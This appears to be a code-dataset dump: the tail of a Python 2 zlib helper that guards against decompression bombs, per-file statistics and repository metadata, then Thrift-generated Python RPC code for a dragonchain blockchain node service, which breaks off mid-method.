decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
availmem = availmem - lentmpstr
offset = offset + lencompbite
fileobj.write(tmpstr)
tmpstr = ''
try:
tmpstr = decomp.flush()
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, le, )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
availmem = availmem - lentmpstr
offset = offset + lencompbite
fileobj.write(tmpstr)
tmpstr = ''
def safe_zlib_decompress_spool_to_file(zbuf, fileobj, maxlen=(65 * (2**20)), maxmem=(65 * (2**20))):
"""
Decompress zbuf so that it decompresses to <= maxlen bytes, while using <= maxmem memory, or else raise an exception. If `zbuf' contains uncompressed data an exception will be raised.
This function guards against memory allocation attacks.
Note that this assumes that data written to `fileobj' does *not* continue to occupy memory.
@param maxlen the resulting text must not be greater than this
@param maxmem the execution of this function must not use more than this amount of memory in bytes; The higher this number is (optimally 1032 * maxlen, or even greater), the faster this function can complete. (Actually I don't fully understand the workings of zlib, so this function might use a *little* more than this memory, but not a lot more.) (Also, this function will raise an exception if the amount of memory required even *approaches* `maxmem'. Another reason to make it large.) (Hence the default value which would seem to be exceedingly large until you realize that it means you can decompress 64 KB chunks of compressiontext at a bite.)
@param fileobj the decompressed text will be written to it
@precondition `fileobj' must be an IO.: fileobj is not None
@precondition `maxlen' must be a real maxlen, geez!: ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0: "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
@precondition `maxmem' must be at least 1 MB.: maxmem >= 2 ** 20: "maxmem: %s" % hr(maxmem)
"""
assert fileobj is not None, "precondition: `fileobj' must be an IO."
assert ((type(maxlen) == types.IntType) or (type(maxlen) == types.LongType)) and maxlen > 0, "precondition: `maxlen' must be a real maxlen, geez!" + " -- " + "maxlen: %s :: %s" % (hr(maxlen), hr(type(maxlen)))
assert maxmem >= 2 ** 20, "precondition: `maxmem' must be at least 1 MB." + " -- " + "maxmem: %s" % hr(maxmem)
tmpstr = ''
lenzbuf = len(zbuf)
offset = 0
decomplen = 0
availmem = maxmem - (76 * 2**10) # zlib can take around 76 KB RAM to do decompression
decomp = zlib.decompressobj()
while offset < lenzbuf:
# How much compressedtext can we safely attempt to decompress now without going over `maxmem'? zlib docs say that theoretical maximum for the zlib format would be 1032:1.
lencompbite = availmem / 1032 # XXX TODO: The biggest compression ratio zlib can have for whole files is 1032:1. Unfortunately I don't know if small chunks of compressiontext *within* a file can expand to more than that. I'll assume not... --Zooko 2001-05-12
if lencompbite < 128:
# If we can't safely attempt even a few bytes of compression text, let us give up. Either `maxmem' was too small or this compressiontext is actually a decompression bomb.
raise UnsafeDecompressError, "used up roughly `maxmem' memory. maxmem: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxmem), hr(len(zbuf)), hr(offset), hr(decomplen),)
# I wish the following were a local function like this:
# def proc_decomp_bite(tmpstr, lencompbite=0, decomplen=decomplen, maxlen=maxlen, availmem=availmem, decompstrlist=decompstrlist, offset=offset, zbuf=zbuf):
# ...but until we can use 2.1 lexical scoping we can't update the integers like `offset'. Oh well. --Zooko 2001-05-12
try:
if (offset == 0) and (lencompbite >= lenzbuf):
tmpstr = decomp.decompress(zbuf)
else:
tmpstr = decomp.decompress(zbuf[offset:offset+lencompbite])
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, le, )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
offset = offset + lencompbite
fileobj.write(tmpstr)
tmpstr = ''
try:
tmpstr = decomp.flush()
except zlib.error, le:
raise ZlibError, (offset, lencompbite, decomplen, le, )
lentmpstr = len(tmpstr)
decomplen = decomplen + lentmpstr
if decomplen > maxlen:
raise TooBigError, "length of resulting data > `maxlen'. maxlen: %s, len(zbuf): %s, offset: %s, decomplen: %s" % (hr(maxlen), hr(len(zbuf)), hr(offset), hr(decomplen),)
offset = offset + lencompbite
fileobj.write(tmpstr)
tmpstr = ''
| 68.009091 | 657 | 0.677851 | 2,081 | 14,962 | 4.864488 | 0.141278 | 0.006223 | 0.017781 | 0.01304 | 0.890448 | 0.886101 | 0.886101 | 0.88294 | 0.88294 | 0.88294 | 0 | 0.019841 | 0.218487 | 14,962 | 219 | 658 | 68.319635 | 0.845891 | 0.244018 | 0 | 0.864662 | 0 | 0.067669 | 0.179286 | 0 | 0 | 0 | 0 | 0.013699 | 0.06015 | 0 | null | null | 0.030075 | 0.007519 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
dd21911b1df076073cb424d5642d2a0e7a323b2e | 85,495 | py | Python | blockchain/gen/messaging/BlockchainService.py | willamm/dragonchain | c3a619e452b6256920ed15ccf5e5263a33dc33e1 | [
"Apache-2.0"
] | 18 | 2016-12-05T22:36:07.000Z | 2021-11-14T14:13:09.000Z | blockchain/gen/messaging/BlockchainService.py | willamm/dragonchain | c3a619e452b6256920ed15ccf5e5263a33dc33e1 | [
"Apache-2.0"
] | null | null | null | blockchain/gen/messaging/BlockchainService.py | willamm/dragonchain | c3a619e452b6256920ed15ccf5e5263a33dc33e1 | [
"Apache-2.0"
] | 12 | 2016-12-24T14:18:13.000Z | 2020-07-22T21:11:36.000Z | #
# Autogenerated by Thrift Compiler (0.9.3)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import logging
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def ping(self):
pass
def get_node_info(self):
pass
def register_node(self, node, pass_phrase):
"""
Parameters:
- node
- pass_phrase
"""
pass
def unregister_node(self, pass_phrase):
"""
Parameters:
- pass_phrase
"""
pass
def phase_1_message(self, p1):
"""
Parameters:
- p1
"""
pass
def phase_2_message(self, p2):
"""
Parameters:
- p2
"""
pass
def phase_3_message(self, p3):
"""
Parameters:
- p3
"""
pass
def phase_4_message(self, p4):
"""
Parameters:
- p4
"""
pass
def phase_5_message(self, p5):
"""
Parameters:
- p5
"""
pass
def receipt_request(self, pass_phrase):
"""
Parameters:
- pass_phrase
"""
pass
def transfer_data(self, pass_phrase, received, unreceived):
"""
Parameters:
- pass_phrase
- received
- unreceived
"""
pass
def subscription_provisioning(self, subscription_id, criteria, phase_criteria, create_ts, public_key):
"""
Parameters:
- subscription_id
- criteria
- phase_criteria
- create_ts
- public_key
"""
pass
def subscription_request(self, subscription_id, subscription_signature):
"""
Parameters:
- subscription_id
- subscription_signature
"""
pass
def get_peers(self):
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def ping(self):
self.send_ping()
self.recv_ping()
def send_ping(self):
self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
args = ping_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ping(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = ping_result()
result.read(iprot)
iprot.readMessageEnd()
return
def get_node_info(self):
self.send_get_node_info()
return self.recv_get_node_info()
def send_get_node_info(self):
self._oprot.writeMessageBegin('get_node_info', TMessageType.CALL, self._seqid)
args = get_node_info_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_node_info(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_node_info_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.unauthorized is not None:
raise result.unauthorized
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_node_info failed: unknown result")
def register_node(self, node, pass_phrase):
"""
Parameters:
- node
- pass_phrase
"""
self.send_register_node(node, pass_phrase)
return self.recv_register_node()
def send_register_node(self, node, pass_phrase):
self._oprot.writeMessageBegin('register_node', TMessageType.CALL, self._seqid)
args = register_node_args()
args.node = node
args.pass_phrase = pass_phrase
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_register_node(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = register_node_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.unauthorized is not None:
raise result.unauthorized
raise TApplicationException(TApplicationException.MISSING_RESULT, "register_node failed: unknown result")
def unregister_node(self, pass_phrase):
"""
Parameters:
- pass_phrase
"""
self.send_unregister_node(pass_phrase)
def send_unregister_node(self, pass_phrase):
self._oprot.writeMessageBegin('unregister_node', TMessageType.ONEWAY, self._seqid)
args = unregister_node_args()
args.pass_phrase = pass_phrase
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def phase_1_message(self, p1):
"""
Parameters:
- p1
"""
self.send_phase_1_message(p1)
return self.recv_phase_1_message()
def send_phase_1_message(self, p1):
self._oprot.writeMessageBegin('phase_1_message', TMessageType.CALL, self._seqid)
args = phase_1_message_args()
args.p1 = p1
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_1_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_1_message_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "phase_1_message failed: unknown result")
def phase_2_message(self, p2):
"""
Parameters:
- p2
"""
self.send_phase_2_message(p2)
return self.recv_phase_2_message()
def send_phase_2_message(self, p2):
self._oprot.writeMessageBegin('phase_2_message', TMessageType.CALL, self._seqid)
args = phase_2_message_args()
args.p2 = p2
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_2_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_2_message_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "phase_2_message failed: unknown result")
def phase_3_message(self, p3):
"""
Parameters:
- p3
"""
self.send_phase_3_message(p3)
return self.recv_phase_3_message()
def send_phase_3_message(self, p3):
self._oprot.writeMessageBegin('phase_3_message', TMessageType.CALL, self._seqid)
args = phase_3_message_args()
args.p3 = p3
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_3_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_3_message_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "phase_3_message failed: unknown result")
def phase_4_message(self, p4):
"""
Parameters:
- p4
"""
self.send_phase_4_message(p4)
return self.recv_phase_4_message()
def send_phase_4_message(self, p4):
self._oprot.writeMessageBegin('phase_4_message', TMessageType.CALL, self._seqid)
args = phase_4_message_args()
args.p4 = p4
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_4_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_4_message_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "phase_4_message failed: unknown result")
def phase_5_message(self, p5):
"""
Parameters:
- p5
"""
self.send_phase_5_message(p5)
return self.recv_phase_5_message()
def send_phase_5_message(self, p5):
self._oprot.writeMessageBegin('phase_5_message', TMessageType.CALL, self._seqid)
args = phase_5_message_args()
args.p5 = p5
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_5_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_5_message_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "phase_5_message failed: unknown result")
def receipt_request(self, pass_phrase):
"""
Parameters:
- pass_phrase
"""
self.send_receipt_request(pass_phrase)
return self.recv_receipt_request()
def send_receipt_request(self, pass_phrase):
self._oprot.writeMessageBegin('receipt_request', TMessageType.CALL, self._seqid)
args = receipt_request_args()
args.pass_phrase = pass_phrase
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_receipt_request(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = receipt_request_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "receipt_request failed: unknown result")
def transfer_data(self, pass_phrase, received, unreceived):
"""
Parameters:
- pass_phrase
- received
- unreceived
"""
self.send_transfer_data(pass_phrase, received, unreceived)
return self.recv_transfer_data()
def send_transfer_data(self, pass_phrase, received, unreceived):
self._oprot.writeMessageBegin('transfer_data', TMessageType.CALL, self._seqid)
args = transfer_data_args()
args.pass_phrase = pass_phrase
args.received = received
args.unreceived = unreceived
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_transfer_data(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = transfer_data_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "transfer_data failed: unknown result")
def subscription_provisioning(self, subscription_id, criteria, phase_criteria, create_ts, public_key):
"""
Parameters:
- subscription_id
- criteria
- phase_criteria
- create_ts
- public_key
"""
self.send_subscription_provisioning(subscription_id, criteria, phase_criteria, create_ts, public_key)
self.recv_subscription_provisioning()
def send_subscription_provisioning(self, subscription_id, criteria, phase_criteria, create_ts, public_key):
self._oprot.writeMessageBegin('subscription_provisioning', TMessageType.CALL, self._seqid)
args = subscription_provisioning_args()
args.subscription_id = subscription_id
args.criteria = criteria
args.phase_criteria = phase_criteria
args.create_ts = create_ts
args.public_key = public_key
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_subscription_provisioning(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = subscription_provisioning_result()
result.read(iprot)
iprot.readMessageEnd()
return
def subscription_request(self, subscription_id, subscription_signature):
"""
Parameters:
- subscription_id
- subscription_signature
"""
self.send_subscription_request(subscription_id, subscription_signature)
return self.recv_subscription_request()
def send_subscription_request(self, subscription_id, subscription_signature):
self._oprot.writeMessageBegin('subscription_request', TMessageType.CALL, self._seqid)
args = subscription_request_args()
args.subscription_id = subscription_id
args.subscription_signature = subscription_signature
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_subscription_request(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = subscription_request_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "subscription_request failed: unknown result")
def get_peers(self):
self.send_get_peers()
return self.recv_get_peers()
def send_get_peers(self):
self._oprot.writeMessageBegin('get_peers', TMessageType.CALL, self._seqid)
args = get_peers_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_peers(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_peers_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.unauthorized is not None:
raise result.unauthorized
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_peers failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["ping"] = Processor.process_ping
self._processMap["get_node_info"] = Processor.process_get_node_info
self._processMap["register_node"] = Processor.process_register_node
self._processMap["unregister_node"] = Processor.process_unregister_node
self._processMap["phase_1_message"] = Processor.process_phase_1_message
self._processMap["phase_2_message"] = Processor.process_phase_2_message
self._processMap["phase_3_message"] = Processor.process_phase_3_message
self._processMap["phase_4_message"] = Processor.process_phase_4_message
self._processMap["phase_5_message"] = Processor.process_phase_5_message
self._processMap["receipt_request"] = Processor.process_receipt_request
self._processMap["transfer_data"] = Processor.process_transfer_data
self._processMap["subscription_provisioning"] = Processor.process_subscription_provisioning
self._processMap["subscription_request"] = Processor.process_subscription_request
self._processMap["get_peers"] = Processor.process_get_peers
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_ping(self, seqid, iprot, oprot):
args = ping_args()
args.read(iprot)
iprot.readMessageEnd()
result = ping_result()
try:
self._handler.ping()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("ping", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_node_info(self, seqid, iprot, oprot):
args = get_node_info_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_node_info_result()
try:
result.success = self._handler.get_node_info()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except UnauthorizedException as unauthorized:
msg_type = TMessageType.REPLY
result.unauthorized = unauthorized
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_node_info", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_register_node(self, seqid, iprot, oprot):
args = register_node_args()
args.read(iprot)
iprot.readMessageEnd()
result = register_node_result()
try:
result.success = self._handler.register_node(args.node, args.pass_phrase)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except UnauthorizedException as unauthorized:
msg_type = TMessageType.REPLY
result.unauthorized = unauthorized
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("register_node", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_unregister_node(self, seqid, iprot, oprot):
args = unregister_node_args()
args.read(iprot)
iprot.readMessageEnd()
try:
self._handler.unregister_node(args.pass_phrase)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except:
pass
def process_phase_1_message(self, seqid, iprot, oprot):
args = phase_1_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_1_message_result()
try:
result.success = self._handler.phase_1_message(args.p1)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_1_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_2_message(self, seqid, iprot, oprot):
args = phase_2_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_2_message_result()
try:
result.success = self._handler.phase_2_message(args.p2)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_2_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_3_message(self, seqid, iprot, oprot):
args = phase_3_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_3_message_result()
try:
result.success = self._handler.phase_3_message(args.p3)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_3_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_4_message(self, seqid, iprot, oprot):
args = phase_4_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_4_message_result()
try:
result.success = self._handler.phase_4_message(args.p4)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_4_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_5_message(self, seqid, iprot, oprot):
args = phase_5_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_5_message_result()
try:
result.success = self._handler.phase_5_message(args.p5)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_5_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_receipt_request(self, seqid, iprot, oprot):
args = receipt_request_args()
args.read(iprot)
iprot.readMessageEnd()
result = receipt_request_result()
try:
result.success = self._handler.receipt_request(args.pass_phrase)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("receipt_request", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_transfer_data(self, seqid, iprot, oprot):
args = transfer_data_args()
args.read(iprot)
iprot.readMessageEnd()
result = transfer_data_result()
try:
result.success = self._handler.transfer_data(args.pass_phrase, args.received, args.unreceived)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("transfer_data", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_subscription_provisioning(self, seqid, iprot, oprot):
args = subscription_provisioning_args()
args.read(iprot)
iprot.readMessageEnd()
result = subscription_provisioning_result()
try:
self._handler.subscription_provisioning(args.subscription_id, args.criteria, args.phase_criteria, args.create_ts, args.public_key)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("subscription_provisioning", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_subscription_request(self, seqid, iprot, oprot):
args = subscription_request_args()
args.read(iprot)
iprot.readMessageEnd()
result = subscription_request_result()
try:
result.success = self._handler.subscription_request(args.subscription_id, args.subscription_signature)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("subscription_request", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_peers(self, seqid, iprot, oprot):
args = get_peers_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_peers_result()
try:
result.success = self._handler.get_peers()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except UnauthorizedException as unauthorized:
msg_type = TMessageType.REPLY
result.unauthorized = unauthorized
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_peers", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class ping_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ping_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_node_info_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
